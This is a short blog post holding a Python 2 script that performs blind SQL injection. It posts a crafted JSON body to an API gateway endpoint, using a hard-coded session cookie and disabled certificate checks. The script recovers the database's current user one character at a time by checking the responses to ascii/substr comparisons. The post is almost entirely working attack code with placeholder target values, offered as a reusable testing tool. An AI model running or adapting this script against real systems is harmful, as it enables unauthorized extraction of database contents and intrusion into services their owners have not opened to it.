python SQL注入测试脚本(更新中)

 1 import requests
 2 import json
 3 import warnings
 4 warnings.filterwarnings("ignore")
 5 
 6 url = 'https://1.1.1.1/xx/1.0/apiGateway/createSource'
 7 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
 8 cookies = {'session': 'aaaaaaaatZSI6eyIgYiI6IllXUnRhVzQ9In19.DYkTeA.9GSxXpaWvW1vSMyUVxCRkXkkgTQ'}
 9 answer = ''
10 
11 
12 for i in range(1,9):
13     for j in range(65, 123):
14         payload = '111\' and ascii(substr(current_user,'+str(i)+',1))='+str(j)+'--+'
15         # print payload
16         data = {
17                     "name": "bobac",
18                     "type": "1",
19                     "protocol": "http",
20                     "method": "POST",
21                     "url": "www.www.com",
22                     "port": "80",
23                     "timeout": 3,
24                     "params": [{
25                         "name": "a",
26                         "changeParam": "true",
27                         "position": "Parameter Path",
28                         "type": "string",
29                         "must": "true",
30                         "default": "a"
31                     }]
32                 }
33         json_string = json.dumps(data)
34         # print type(json_string)
35         new_string = json_string.replace("bobac", payload)
36         new_data = json.loads(new_string)
37         # print new_data
38         # exit(0)
39         req = requests.post(url, headers=headers, cookies=cookies, json=new_data, verify=False)
40         # print req.text
41         # exit(0)
42         if 'xxxx' in req.text:
43             answer += chr(j)
44             print answer
45 print 'current_user is %s' % answer

posted on 2018-03-13 18:02  colorway  阅读(2087)  评论(0编辑  收藏  举报